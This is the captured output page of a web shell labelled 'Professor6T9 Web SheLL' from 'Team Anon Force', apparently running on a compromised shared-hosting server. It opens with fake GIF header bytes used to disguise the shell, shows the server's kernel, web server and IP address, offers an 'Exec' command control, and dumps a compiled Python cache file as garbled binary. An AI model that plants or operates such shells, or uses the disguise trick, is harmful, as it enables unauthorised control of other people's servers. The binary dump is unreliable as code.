GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
astroid
/
brain
/
__pycache__
[ HOME ]
Exec
Submit
File Name : brain_numpy_ma.cpython-311.pyc
� � h� � �^ � d Z ddlmZ ddlmZ ddlmZ d� Z e e� � de� � dS )z"Astroid hooks for numpy ma module.� )�register_module_extender��parse)�AstroidManagerc � � t d� � S )z} Infer the call of various numpy.ma functions. :param node: node to infer :param context: inference context z� import numpy.ma def masked_where(condition, a, copy=True): return numpy.ma.masked_array(a, mask=[]) def masked_invalid(a, copy=True): return numpy.ma.masked_array(a, mask=[]) r � � �m/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/astroid/brain/brain_numpy_ma.py�numpy_ma_transformr s � � � � � � r znumpy.maN)�__doc__�astroid.brain.helpersr �astroid.builderr �astroid.managerr r r r r �<module>r sx �� )� (� :� :� :� :� :� :� !� !� !� !� !� !� *� *� *� *� *� *�� � �&